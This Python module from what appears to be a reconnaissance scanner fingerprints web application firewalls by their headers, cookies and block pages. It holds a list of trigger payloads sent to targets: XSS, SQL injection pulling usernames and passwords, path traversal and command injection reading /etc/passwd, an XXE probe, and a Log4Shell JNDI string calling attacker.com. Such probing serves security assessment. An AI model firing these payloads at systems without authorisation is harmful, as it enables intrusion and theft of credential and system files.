"""WAF (Web Application Firewall) Detection module.

Identifies web application firewalls by sending trigger payloads and
analyzing response characteristics including headers, cookies, status
codes, and response body patterns.
"""

import asyncio
import re
from typing import Any, Optional

import httpx

from recon_phantom.scanners.base import BaseScanner


# WAF detection signatures: maps WAF name to detection criteria
WAF_SIGNATURES: dict[str, dict[str, Any]] = {
    "Cloudflare": {
        "headers": {
            "cf-ray": r".*",
            "cf-cache-status": r".*",
            "server": r"cloudflare",
        },
        "cookies": ["__cfduid", "cf_clearance", "__cf_bm"],
        "body_patterns": [
            r"Attention Required! \| Cloudflare",
            r"cloudflare\.com/5xx-error-landing",
            r"ray ID:",
            r"Cloudflare Ray ID",
            r"cf-error-details",
        ],
        "status_codes": [403, 503, 1020],
    },
    "Akamai (AkamaiGHost)": {
        "headers": {
            "server": r"AkamaiGHost",
            "x-akamai-transformed": r".*",
            "akamai-grn": r".*",
        },
        "cookies": ["AkaSid", "akamai_session", "aka_"],
        "body_patterns": [
            r"Access Denied.*Akamai",
            r"Reference #[\d.]+",
            r"akamaihd\.net",
        ],
        "status_codes": [403],
    },
    "AWS WAF": {
        "headers": {
            "x-amzn-requestid": r".*",
            "x-amz-apigw-id": r".*",
            "x-amzn-trace-id": r".*",
        },
        "cookies": ["awsalb", "awsalbcors", "AWSALB"],
        "body_patterns": [
            r"<html>.*Request blocked",
            r"AWS WAF",
            r"x-amzn-waf",
        ],
        "status_codes": [403],
    },
    "Imperva (Incapsula)": {
        "headers": {
            "x-iinfo": r".*",
            "x-cdn": r"Imperva|Incapsula",
        },
        "cookies": ["incap_ses_", "visid_incap_", "nlbi_"],
        "body_patterns": [
            r"Incapsula incident ID",
            r"_Incapsula_Resource",
            r"imperva\.com",
            r"blocked by Imperva",
        ],
        "status_codes": [403],
    },
    "Sucuri": {
        "headers": {
            "x-sucuri-id": r".*",
            "x-sucuri-cache": r".*",
            "server": r"Sucuri",
        },
        "cookies": ["sucuri_cloudproxy_uuid"],
        "body_patterns": [
            r"Sucuri WebSite Firewall",
            r"sucuri\.net/privacy-policy",
            r"Access Denied.*Sucuri",
            r"Sucuri CloudProxy",
        ],
        "status_codes": [403],
    },
    "Barracuda": {
        "headers": {
            "server": r"Barracuda",
            "barra_counter_session": r".*",
        },
        "cookies": ["barra_counter_session", "BNI__BARRACUDA_LB_COOKIE"],
        "body_patterns": [
            r"Barracuda.*Web Application Firewall",
            r"barra_counter_session",
        ],
        "status_codes": [403],
    },
    "F5 BIG-IP": {
        "headers": {
            "server": r"BigIP|BIG-IP",
            "x-wa-info": r".*",
        },
        "cookies": ["BIGipServer", "TS01", "f5_cspm", "MRHSession"],
        "body_patterns": [
            r"The requested URL was rejected",
            r"Please consult with your administrator",
            r"F5 Networks",
            r"BIG-IP.*violation",
        ],
        "status_codes": [403],
    },
    "ModSecurity": {
        "headers": {
            "server": r"mod_security|NOYB|ModSecurity",
        },
        "cookies": [],
        "body_patterns": [
            r"ModSecurity",
            r"Mod_Security",
            r"NOYB",
            r"This error was generated by Mod_Security",
            r"rules of the mod_security module",
            r"Not Acceptable!.*security rules",
        ],
        "status_codes": [403, 406],
    },
    "Fortinet FortiWeb": {
        "headers": {
            "server": r"FortiWeb",
        },
        "cookies": ["FORTIWAFSID"],
        "body_patterns": [
            r"FortiWeb",
            r"\.fwb_rd",
            r"FortiGuard",
        ],
        "status_codes": [403],
    },
    "DDoS-Guard": {
        "headers": {
            "server": r"ddos-guard",
        },
        "cookies": ["__ddg1_", "__ddg2_"],
        "body_patterns": [
            r"DDoS-Guard",
            r"ddos-guard\.net",
        ],
        "status_codes": [403],
    },
    "Wordfence": {
        "headers": {},
        "cookies": ["wfwaf-authcookie"],
        "body_patterns": [
            r"Generated by Wordfence",
            r"wordfence\.com",
            r"This response was generated by Wordfence",
            r"Your access to this site has been limited",
        ],
        "status_codes": [403, 503],
    },
}

# Test payloads designed to trigger WAF rules
WAF_TRIGGER_PAYLOADS: list[dict[str, str]] = [
    {
        "name": "XSS Basic",
        "payload": "<script>alert(1)</script>",
        "param": "q",
    },
    {
        "name": "XSS Event Handler",
        "payload": '<img src=x onerror=alert(1)>',
        "param": "search",
    },
    {
        "name": "SQL Injection",
        "payload": "' OR 1=1 --",
        "param": "id",
    },
    {
        "name": "SQL Union Select",
        "payload": "1 UNION SELECT username,password FROM users--",
        "param": "id",
    },
    {
        "name": "Path Traversal",
        "payload": "../../../etc/passwd",
        "param": "file",
    },
    {
        "name": "Path Traversal Windows",
        "payload": "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
        "param": "file",
    },
    {
        "name": "Command Injection",
        "payload": "; cat /etc/passwd",
        "param": "cmd",
    },
    {
        "name": "Log4Shell",
        "payload": "${jndi:ldap://attacker.com/a}",
        "param": "input",
    },
    {
        "name": "XXE Probe",
        "payload": '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>',
        "param": "data",
    },
]


class WAFDetector(BaseScanner):
    """Detects and fingerprints Web Application Firewalls.

    Sends carefully crafted payloads designed to trigger WAF rules, then
    analyzes response characteristics to identify specific WAF products.
    """

    @property
    def module_name(self) -> str:
        return "waf_detector"

    async def run(self) -> list[dict[str, Any]]:
        """Execute the WAF detection scan.

        Returns:
            List of findings identifying WAF products and their signatures.
        """
        results: list[dict[str, Any]] = []
        base_url = self.get_base_url("https")

        await self.emit_event("waf_scan_started", {"url": base_url})

        # Phase 1: Passive detection from normal response
        passive_results = await self._passive_detection(base_url)
        results.extend(passive_results)

        # Phase 2: Active detection using trigger payloads
        active_results = await self._active_detection(base_url)
        results.extend(active_results)

        # Phase 3: Consolidate and summarize detected WAFs
        detected_wafs = set()
        for r in results:
            waf_name = r.get("data", {}).get("waf_name")
            if waf_name:
                detected_wafs.add(waf_name)

        if detected_wafs:
            results.append(self.build_result(
                title=f"WAF Detected: {', '.join(sorted(detected_wafs))}",
                description=(
                    f"Web Application Firewall(s) identified: {', '.join(sorted(detected_wafs))}. "
                    "The target is protected by WAF technology which may filter malicious requests."
                ),
                severity="info",
                host=self.target,
                data={
                    "detected_wafs": sorted(detected_wafs),
                    "total_signatures": len(results) - 1,
                },
                confidence=0.9,
            ))
        else:
            results.append(self.build_result(
                title="No WAF Detected",
                description=(
                    "No Web Application Firewall was detected. The application "
                    "may be directly exposed without WAF protection, or the WAF "
                    "is configured to not reveal its presence."
                ),
                severity="info",
                host=self.target,
                data={"detected_wafs": [], "payloads_tested": len(WAF_TRIGGER_PAYLOADS)},
                confidence=0.7,
            ))

        await self.emit_event("waf_scan_completed", {
            "detected": sorted(detected_wafs),
            "findings": len(results),
        })
        return results

    async def _passive_detection(self, base_url: str) -> list[dict[str, Any]]:
        """Detect WAF from a normal (non-malicious) request.

        Analyzes headers, cookies, and response characteristics without
        sending any attack payloads.
        """
        results: list[dict[str, Any]] = []

        response = await self.make_request(base_url)
        if response is None:
            return results

        detected = self._match_signatures(response)
        for waf_name, evidence_items in detected.items():
            results.append(self.build_result(
                title=f"WAF Passive Detection: {waf_name}",
                description=(
                    f"{waf_name} WAF detected via passive analysis of normal response. "
                    f"Evidence: {'; '.join(evidence_items[:3])}"
                ),
                severity="info",
                evidence="\n".join(evidence_items),
                host=self.target,
                data={
                    "waf_name": waf_name,
                    "detection_method": "passive",
                    "evidence_count": len(evidence_items),
                },
                confidence=0.85,
            ))

        return results

    async def _active_detection(self, base_url: str) -> list[dict[str, Any]]:
        """Detect WAF by sending trigger payloads and analyzing responses."""
        results: list[dict[str, Any]] = []
        semaphore = self.get_semaphore()

        async def test_payload(payload_info: dict[str, str]) -> Optional[dict[str, Any]]:
            async with semaphore:
                return await self._send_trigger_payload(base_url, payload_info)

        tasks = [test_payload(p) for p in WAF_TRIGGER_PAYLOADS]
        payload_results = await asyncio.gather(*tasks, return_exceptions=True)

        # Aggregate all active detections
        active_detections: dict[str, list[str]] = {}
        for result in payload_results:
            if isinstance(result, dict):
                for waf_name, evidence_items in result.items():
                    if waf_name not in active_detections:
                        active_detections[waf_name] = []
                    active_detections[waf_name].extend(evidence_items)

        for waf_name, evidence_items in active_detections.items():
            unique_evidence = list(set(evidence_items))
            results.append(self.build_result(
                title=f"WAF Active Detection: {waf_name}",
                description=(
                    f"{waf_name} WAF detected via active probing with trigger payloads. "
                    f"The WAF blocked or modified {len(unique_evidence)} test requests."
                ),
                severity="info",
                evidence="\n".join(unique_evidence[:5]),
                host=self.target,
                data={
                    "waf_name": waf_name,
                    "detection_method": "active",
                    "evidence_count": len(unique_evidence),
                    "trigger_count": len(unique_evidence),
                },
                confidence=0.9,
            ))

        return results

    async def _send_trigger_payload(
        self, base_url: str, payload_info: dict[str, str]
    ) -> dict[str, list[str]]:
        """Send a single trigger payload and analyze the response.

        Returns:
            Dictionary mapping detected WAF names to evidence strings.
        """
        detected: dict[str, list[str]] = {}
        payload = payload_info["payload"]
        param_name = payload_info["param"]
        payload_name = payload_info["name"]

        # Test via URL parameter
        url_with_payload = f"{base_url}/?{param_name}={payload}"
        response = await self.make_request(url_with_payload, follow_redirects=False)

        if response is not None:
            matches = self._match_signatures(response)
            for waf_name, evidence_items in matches.items():
                if waf_name not in detected:
                    detected[waf_name] = []
                detected[waf_name].extend(
                    [f"[{payload_name}] {e}" for e in evidence_items]
                )

            # Check if response indicates blocking (403, 406, 429, 503)
            if response.status_code in (403, 406, 429, 503):
                # Try to identify WAF from block page
                body = response.text[:5000] if response.text else ""
                body_matches = self._match_body_patterns(body)
                for waf_name, patterns in body_matches.items():
                    if waf_name not in detected:
                        detected[waf_name] = []
                    detected[waf_name].extend(
                        [f"[{payload_name}] Block page: {p}" for p in patterns]
                    )

        # Test via POST body for certain payloads
        if payload_info["name"] in ("XSS Basic", "SQL Injection", "Command Injection"):
            response = await self.make_request(
                base_url,
                method="POST",
                data={param_name: payload},
                follow_redirects=False,
            )
            if response is not None:
                matches = self._match_signatures(response)
                for waf_name, evidence_items in matches.items():
                    if waf_name not in detected:
                        detected[waf_name] = []
                    detected[waf_name].extend(
                        [f"[{payload_name} POST] {e}" for e in evidence_items]
                    )

        return detected

    def _match_signatures(self, response: httpx.Response) -> dict[str, list[str]]:
        """Match response against all WAF signatures.

        Returns:
            Dictionary mapping WAF names to lists of matching evidence strings.
        """
        detected: dict[str, list[str]] = {}
        resp_headers = {k.lower(): v for k, v in response.headers.items()}
        cookies_str = "; ".join(
            f"{c.name}={c.value}" for c in response.cookies.jar
        ) if hasattr(response, 'cookies') else ""
        cookie_header = resp_headers.get("set-cookie", "")

        for waf_name, signatures in WAF_SIGNATURES.items():
            evidence: list[str] = []

            # Check headers
            for header_name, pattern in signatures.get("headers", {}).items():
                header_val = resp_headers.get(header_name, "")
                if header_val and re.search(pattern, header_val, re.IGNORECASE):
                    evidence.append(f"Header match: {header_name}: {header_val}")

            # Check cookies
            all_cookies = cookies_str + " " + cookie_header
            for cookie_name in signatures.get("cookies", []):
                if cookie_name.lower() in all_cookies.lower():
                    evidence.append(f"Cookie match: {cookie_name}")

            # Check status codes (only flag if we have other evidence too)
            if response.status_code in signatures.get("status_codes", []):
                if evidence:
                    evidence.append(f"Status code: {response.status_code}")

            if evidence:
                detected[waf_name] = evidence

        return detected

    def _match_body_patterns(self, body: str) -> dict[str, list[str]]:
        """Match response body against WAF block page patterns.

        Returns:
            Dictionary mapping WAF names to matching patterns.
        """
        detected: dict[str, list[str]] = {}

        for waf_name, signatures in WAF_SIGNATURES.items():
            matched_patterns: list[str] = []
            for pattern in signatures.get("body_patterns", []):
                if re.search(pattern, body, re.IGNORECASE | re.DOTALL):
                    matched_patterns.append(pattern)

            if matched_patterns:
                detected[waf_name] = matched_patterns

        return detected
